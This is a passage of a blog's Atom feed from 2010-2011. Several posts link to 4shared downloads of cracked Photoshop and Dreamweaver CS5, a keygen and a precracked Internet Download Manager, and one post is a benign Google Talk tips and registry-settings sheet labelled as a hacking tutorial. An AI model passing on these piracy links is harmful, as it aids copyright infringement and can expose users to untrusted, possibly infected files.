&lt;a href="http://feedads.g.doubleclick.net/~a/L5dPBCsIp0JaPa6w6-SVVzdRAvU/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/L5dPBCsIp0JaPa6w6-SVVzdRAvU/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/spxz4--UTfU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/6010754805660697878/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2011/08/to-download-copy-this-link-in-new-tab.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/6010754805660697878?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/6010754805660697878?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/spxz4--UTfU/to-download-copy-this-link-in-new-tab.html" title="Dreamweaver CS5 Crack" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-ZhDJeCvZmpo/Tlyss-LxszI/AAAAAAAABdk/yPBbIok2nUA/s72-c/dream.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2011/08/to-download-copy-this-link-in-new-tab.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkQGSXY6fip7ImA9WhdXFkQ.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-6154003012782955435</id><published>2011-08-30T02:23:00.000-07:00</published><updated>2011-08-30T02:58:48.816-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-08-30T02:58:48.816-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Photoshop" /><category scheme="http://www.blogger.com/atom/ns#" term="software" /><category scheme="http://www.blogger.com/atom/ns#" term="Crack" /><title>Photoshop CS5 Crack</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-Hx8ZrF5apn0/Tlyrvv9zXRI/AAAAAAAABdg/uIfAYMx7q4M/s1600/Adobe-Photoshop-CS5-Icon-psd47180.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-Hx8ZrF5apn0/Tlyrvv9zXRI/AAAAAAAABdg/uIfAYMx7q4M/s320/Adobe-Photoshop-CS5-Icon-psd47180.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: xx-small;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;To download copy this link in new tab :-&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: xx-small;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;http://www.4shared.com/file/zH2K0M0H/Photoshop_CS5_Crack_NDR_Group.html &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-6154003012782955435?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/-UbSkOClzCOBdiJQJT0VoYa1_xw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/-UbSkOClzCOBdiJQJT0VoYa1_xw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/-UbSkOClzCOBdiJQJT0VoYa1_xw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/-UbSkOClzCOBdiJQJT0VoYa1_xw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/G4DkrGp8VB4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/6154003012782955435/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2011/08/photoshop-cs5-crack.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/6154003012782955435?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/6154003012782955435?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/G4DkrGp8VB4/photoshop-cs5-crack.html" title="Photoshop CS5 Crack" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-Hx8ZrF5apn0/Tlyrvv9zXRI/AAAAAAAABdg/uIfAYMx7q4M/s72-c/Adobe-Photoshop-CS5-Icon-psd47180.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2011/08/photoshop-cs5-crack.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkUMRXw7eSp7ImA9WhdXFkQ.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-8482821045230307957</id><published>2011-08-30T02:21:00.000-07:00</published><updated>2011-08-30T02:58:04.201-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-08-30T02:58:04.201-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Keygen" /><category scheme="http://www.blogger.com/atom/ns#" term="software" /><category scheme="http://www.blogger.com/atom/ns#" term="Dreamweaver" /><title>Dreamweaver CS5 Keygen</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-MN79G0uFEFg/TlyfUYgebCI/AAAAAAAABdc/Y_8x0mDzbYg/s1600/Adobe_Dreamweaver_CS5_Icon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-MN79G0uFEFg/TlyfUYgebCI/AAAAAAAABdc/Y_8x0mDzbYg/s320/Adobe_Dreamweaver_CS5_Icon.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class="Apple-style-span" style="color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;To download copy this link in new tab :- &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&amp;nbsp;http://www.4shared.com/file/j8osy5_k/NDR_Group.html&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-8482821045230307957?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/xpQ3t5btFBxchiKFdvlxYGIzZps/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xpQ3t5btFBxchiKFdvlxYGIzZps/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/xpQ3t5btFBxchiKFdvlxYGIzZps/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xpQ3t5btFBxchiKFdvlxYGIzZps/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/8bG0hSf3hEg" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/8482821045230307957/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2011/08/dreamweaver-cs5-keygen.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/8482821045230307957?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/8482821045230307957?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/8bG0hSf3hEg/dreamweaver-cs5-keygen.html" title="Dreamweaver CS5 Keygen" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-MN79G0uFEFg/TlyfUYgebCI/AAAAAAAABdc/Y_8x0mDzbYg/s72-c/Adobe_Dreamweaver_CS5_Icon.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2011/08/dreamweaver-cs5-keygen.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUQDQnc6fSp7ImA9WhdXFkQ.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-726968152449618735</id><published>2010-11-19T06:38:00.000-08:00</published><updated>2011-08-30T02:42:53.915-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-08-30T02:42:53.915-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="software" /><title>Internet Download Manager 5.19.1 Precracked</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-cURzOZ4WHdw/Tlywkk-cSoI/AAAAAAAABdo/Jq6EiENdxzE/s1600/Internet-Download-Manager.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-cURzOZ4WHdw/Tlywkk-cSoI/AAAAAAAABdo/Jq6EiENdxzE/s1600/Internet-Download-Manager.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;h3 class="style28" style="background-position: 50% 50%; clip: inherit; color: #00668c; font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 13px; font-style: inherit; font-weight: bold; text-decoration: inherit;"&gt;
&lt;span class="Apple-style-span" style="color: black; font-family: 'Times New Roman'; font-size: small; font-weight: normal;"&gt;&lt;h3 class="style28" style="background-position: 50% 50%; clip: inherit; color: #00668c; display: inline !important; font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 13px; font-style: inherit; font-weight: bold; text-decoration: inherit;"&gt;
&lt;span class="Apple-style-span" style="color: black; font-family: 'Times New Roman'; font-size: small; font-weight: normal;"&gt;&lt;h3 class="style28" style="background-position: 50% 50%; clip: inherit; color: #00668c; display: inline !important; font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 13px; font-style: inherit; font-weight: bold; text-decoration: inherit;"&gt;
What's new in version 5.19?&lt;/h3&gt;
&lt;/span&gt;&lt;/h3&gt;
&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span class="style12" style="background-position: 50% 50%; clip: inherit; color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: 13px; font-style: inherit; text-decoration: inherit;"&gt;Added "Download panel" for selected links on a web-page&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="style12" style="background-position: 50% 50%; clip: inherit; color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: 13px; font-style: inherit; text-decoration: inherit;"&gt;Improved Windows 7 compatibility&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="style12" style="background-position: 50% 50%; clip: inherit; color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: 13px; font-style: inherit; text-decoration: inherit;"&gt;Fixed bugs&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="style12" style="background-position: 50% 50%; clip: inherit; color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: 13px; font-style: inherit; text-decoration: inherit;"&gt;&lt;span class="Apple-style-span" style="color: black; font-family: 'Times New Roman'; font-size: small;"&gt;&lt;span class="style12" style="background-position: 50% 50%; clip: inherit; color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: 13px; font-style: inherit; text-decoration: inherit;"&gt;&lt;h3 class="style28" style="background-position: 50% 50%; clip: inherit; color: #00668c; display: inline !important; font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 13px; font-style: inherit; font-weight: bold; text-decoration: inherit;"&gt;
&lt;span class="Apple-style-span" style="color: black; font-family: 'Times New Roman'; font-size: small; font-weight: normal;"&gt;&lt;span class="style12" style="background-position: 50% 50%; clip: inherit; color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: 13px; font-style: inherit; text-decoration: inherit;"&gt;Fixed a security vulnerability&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;To download copy this link in new tab :-&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;http://www.4shared.com/file/RzSAkdCS/Internet_Download_Manager_5191.html&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="color: #000033; font-family: Geneva,Arial,Helvetica,sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-726968152449618735?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/IwQIpZ4vRzbgu3hXem5L9yHMdo0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/IwQIpZ4vRzbgu3hXem5L9yHMdo0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/IwQIpZ4vRzbgu3hXem5L9yHMdo0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/IwQIpZ4vRzbgu3hXem5L9yHMdo0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/I0Nst8BjeCU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/726968152449618735/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2010/11/internet-download-manager-5191.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/726968152449618735?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/726968152449618735?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/I0Nst8BjeCU/internet-download-manager-5191.html" title="Internet Download Manager 5.19.1 Precracked" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-cURzOZ4WHdw/Tlywkk-cSoI/AAAAAAAABdo/Jq6EiENdxzE/s72-c/Internet-Download-Manager.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2010/11/internet-download-manager-5191.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkIGRn8yfSp7ImA9Wx5XGE0.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-8875820284622332171</id><published>2010-09-12T05:31:00.000-07:00</published><updated>2010-09-18T03:08:47.195-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-09-18T03:08:47.195-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials" /><title>Google Talk Cheat Sheet</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_ibkwjOee24U/TIzHqj_-FTI/AAAAAAAAAfA/k2YJFKFtNuY/s1600/google_talk12345.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="151" src="http://3.bp.blogspot.com/_ibkwjOee24U/TIzHqj_-FTI/AAAAAAAAAfA/k2YJFKFtNuY/s320/google_talk12345.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Are you crazy about Google Talk. Do you  want to be become a master of Google Talk? Then here is a source for you  to know each and every secret of Google Talk. I think this is a  complete list of tips, tricks, hacks, howto’s, keyboard shortcuts and  few miscellaneous facts about Google Talk.&lt;/div&gt;&lt;h3&gt;Tips &amp;amp; Tricks&lt;/h3&gt;&lt;strong&gt;1. Change the font size&lt;/strong&gt;&lt;br /&gt;
While holding the control key, move the scroll wheel on your mouse  either up or down. This trick works while being focused in either the  read or write area.&lt;br /&gt;
&lt;strong&gt;2. Insert line breaks&lt;/strong&gt;&lt;br /&gt;
If you want to have a message that spans multiple paragraphs, just  hold shift and hit enter. You can add as many new lines as you want to  create.&lt;br /&gt;
&lt;strong&gt;3. Bold Text&lt;/strong&gt;&lt;br /&gt;
To write something bold, you can use an asterisk before and after the word. For Example *Hacker*&lt;br /&gt;
&lt;strong&gt;4. Italic Text&lt;/strong&gt;&lt;br /&gt;
To use italics, use an underscore before and after the word. For Example _Hacker_&lt;br /&gt;
&lt;strong&gt;5. Switch windows&lt;/strong&gt;&lt;br /&gt;
Hitting tab will cycle through open windows. It will select minimized  conversations, to expand them just hit enter. If you just want to cycle  through IM’s and don’t care about the buddy list, control-tab will do  that and will automatically expand a minimized conversation if you  settle on one.&lt;br /&gt;
&lt;strong&gt;6. Invitation Tips&lt;/strong&gt;&lt;br /&gt;
You don’t need to say Yes or No when someone wants to add you as a  friend; you can simply ignore it, the request will go away. (On the  other hand, someone with whom you chat often will automatically turn to  be your friend, unless you disable this in the options).&lt;br /&gt;
&lt;strong&gt;7. Show Hyperlinks&lt;/strong&gt;&lt;br /&gt;
You can show your homepage or blog URL simply by entering it in your  away message (at the top of the main window). It will automatically turn  to a link visible to others.&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;How To’s&lt;/h3&gt;&lt;strong&gt;1. &lt;/strong&gt;&lt;strong&gt;Use multiple identities on Google Talk&lt;/strong&gt;&lt;br /&gt;
Want to run Google Talk with multiple Gmail identities? If you have  several Google Gmail accounts you also may want to run multiple  instances of Google Talk This is especially important for families that  share a single PC. Basically, to have “Google Polygamy” you need to run  Google Talk with the following switch: /nomutex&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Right-click on the desktop&lt;/li&gt;
&lt;li&gt;Select New -&amp;gt; Shortcut&lt;/li&gt;
&lt;li&gt;Paste the following into the Address box:&lt;/li&gt;
&lt;/ul&gt;&lt;blockquote&gt;&lt;em&gt;“C:\program files\google\google talk\googletalk.exe” /nomutex&lt;/em&gt;&lt;/blockquote&gt;&lt;ul&gt;&lt;li&gt;Click Next and choose a shortcut name such as Google Talk1, Google  Talk2, or something related to your Gmail account for easy remembering  which account is which.&lt;/li&gt;
&lt;/ul&gt;&lt;strong&gt; &lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;2. &lt;/strong&gt;&lt;strong&gt;Use Google Talk via a Web Browser&lt;/strong&gt;&lt;br /&gt;
You want to use Google Talk anywhere ? Follow these guidelines &lt;img alt=":)" class="wp-smiley" src="http://www.hungry-hackers.com/wp-includes/images/smilies/icon_smile.gif" /&gt; &lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Opens your favourite web browser.&lt;/li&gt;
&lt;li&gt;Go to following Website&lt;/li&gt;
&lt;/ul&gt;&lt;blockquote&gt;&lt;em&gt;http://www.webjabber.net:8080/jim/&lt;/em&gt;&lt;/blockquote&gt;&lt;ul&gt;&lt;li&gt;Follow the instructions of the Page.&lt;/li&gt;
&lt;li&gt;You can talk with your friends&lt;/li&gt;
&lt;/ul&gt;&lt;strong&gt; &lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;3. &lt;/strong&gt;&lt;strong&gt; Conference Calls&lt;/strong&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Open up a copy of Google Talk on all computers with which you wish to conference.&lt;/li&gt;
&lt;li&gt;After one copy is opened make a new shortcut for Google Talk but at the end of it add /nomutex.&lt;/li&gt;
&lt;li&gt;If you installed it to the default folder then your shortcut should  read “C:\Program Files\Google\Google Talk\googletalk.exe” /nomutex.&lt;/li&gt;
&lt;li&gt;Open 2nd instances of the software on every user’s computer.&lt;/li&gt;
&lt;li&gt;After this start a chain: User 1 should connect on one instance to  user 2. User 2 will connect on his second instance to user 3. User 3  will connect using his second instance back to user 1. With this chain  everyone is connected to everyone.&lt;/li&gt;
&lt;/ul&gt;&lt;strong&gt;4. &lt;/strong&gt;&lt;strong&gt;Change Nickname&lt;/strong&gt;&lt;br /&gt;
You can’t change your nickname in a way that other people will see it  change. Every nickname in the Google Talk Contact List is the part that  is before @gmail.com (only the alphabetical characters are used) or the  name you chosen for your GMail account. To change the nickname you need  to do the following:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Go to your Gmail account and change the name there.&lt;/li&gt;
&lt;li&gt;Choose Settings, Accounts, and then Edit info. Click on the second radio button, and enter your custom name.&lt;/li&gt;
&lt;li&gt;As a result all of your emails will have that nick as well, there is no way to seperate the two.&lt;/li&gt;
&lt;li&gt;You can add a website in your custom message, it will be clickable when someone opens a conversation window with you.&lt;/li&gt;
&lt;/ul&gt;&lt;strong&gt; &lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;5. &lt;/strong&gt;&lt;strong&gt;Contacts&lt;/strong&gt;&lt;br /&gt;
You don’t need to say Yes or No when someone wants to add you as a  friend; you can simply ignore it, the request will go away. (On the  other hand, someone with whom you chat often will automatically turn to  be your friend, unless you disable this).&lt;br /&gt;
&lt;strong&gt; &lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;6. &lt;/strong&gt;&lt;strong&gt;Play Music&lt;/strong&gt;&lt;br /&gt;
It’s possible to broadcast music, MP3, etc. through Google Talk. Follow the steps given bellow:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Unplug your microphone.&lt;/li&gt;
&lt;li&gt;Double click on the speaker icon in the lower right corner. This will open up “Volume Control”.&lt;/li&gt;
&lt;li&gt;Select “Options” and then “Properties”. Then check the button next to “Recording” then click OK.&lt;/li&gt;
&lt;li&gt;You may also have to change your setting under Mixer Device. Now the Recording Control screen should be up.&lt;/li&gt;
&lt;li&gt;On my computer I selected “Wave Out Mix”. Click on the green phone in Google Talk and call your friend.&lt;/li&gt;
&lt;/ul&gt;&lt;h3&gt;Registry Hacks&lt;/h3&gt;Before applying any of these Registry Tweaks follow the steps given below:&lt;br /&gt;
&lt;ol&gt;&lt;li&gt;Backup your Registry&lt;/li&gt;
&lt;li&gt;Start -&amp;gt; Run -&amp;gt; Regedit&lt;/li&gt;
&lt;li&gt; Now Navigate to the following directory&lt;/li&gt;

&lt;blockquote&gt;HKEY_CURRENT_USER\Software\Google\Google Talk.&lt;/blockquote&gt;
&lt;li&gt;Make Changes based on the info given bellow.&lt;/li&gt;
&lt;li&gt;Restart your PC for the changes to take effect.&lt;/li&gt;
&lt;/ol&gt;The “Google/Google Talk” key has several sub-keys that hold different option values:&lt;br /&gt;
&lt;strong&gt;Accounts&lt;/strong&gt;: This one has subkeys for each different  account that has logged in on the client. These keys have different  values that store the username, password and connection options.&lt;br /&gt;
&lt;strong&gt;&lt;br /&gt;
Autoupdate&lt;/strong&gt;: Stores the current version information. When the  client checks for updates it compares Google’s response with these  values. If an update is needed, it will download and update the new  version.&lt;br /&gt;
&lt;strong&gt;Options&lt;/strong&gt;: This is the most interesting part, where most of the current hacks should be used (keep reading).&lt;br /&gt;
&lt;strong&gt;Process&lt;/strong&gt;: Stores the process ID. Probably used by Google Talk to detect if it’s already running or not.&lt;br /&gt;
&lt;ol&gt;&lt;li&gt;&lt;strong&gt; HKEY_CURRENT_USER\Software\Google\Google Talk\Options\show_pin&lt;/strong&gt;&lt;/li&gt;
If 1, shows a “pin” next to the minimize button that keeps the windows on top of all the other open windows when clicked.
&lt;li&gt;&lt;strong&gt;HKEY_CURRENT_USER\Software\Google\Google Talk\Options\view_show_taskbutton&lt;/strong&gt;&lt;/li&gt;
If 0, hides the taskbar button, and leaves the tray icon only, when the window is shown
&lt;li&gt;&lt;strong&gt;HKEY_CURRENT_USER\Software\Google\Google Talk\Options\away_inactive&lt;/strong&gt;&lt;/li&gt;
If 1, status will be set as Away after the specified number of minutes.
&lt;li&gt;&lt;strong&gt;HKEY_CURRENT_USER\Software\Google\Google Talk\Options\away_screensaver&lt;/strong&gt;&lt;/li&gt;
If 1, status will be set as Away after the specified number of minutes.
&lt;li&gt;&lt;strong&gt;HKEY_CURRENT_USER\Software\Google\Google Talk\Options\inactive_minutes&lt;/strong&gt;&lt;/li&gt;
Number of inactive minutes to become away if auto-away is on.&lt;/ol&gt;&lt;h3&gt;Keyboard Shortcuts&lt;/h3&gt;&lt;table border="0px" cellpadding="3px" cellspacing="0"&gt;&lt;tbody&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;&lt;strong&gt;Shortcut&lt;/strong&gt;&lt;/td&gt; &lt;td valign="top" width="486"&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Ctrl + E&lt;/td&gt; &lt;td valign="top" width="486"&gt;It centralizes the selected text, or the current line.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Ctrl + R&lt;/td&gt; &lt;td valign="top" width="486"&gt;It justifies to the right the selected text, or the current line.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Ctrl + L&lt;/td&gt; &lt;td valign="top" width="486"&gt;It justifies to the left the selected text, or the current line.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Ctrl + I&lt;/td&gt; &lt;td valign="top" width="486"&gt;The same thing does that Tab.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Tab&lt;/td&gt; &lt;td valign="top" width="486"&gt;It is giving the area to each of the windows opened by Google Talk.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Ctrl + Tab&lt;/td&gt; &lt;td valign="top" width="486"&gt;The same thing does that Tab but in reverse.&lt;/td&gt; &lt;/tr&gt;
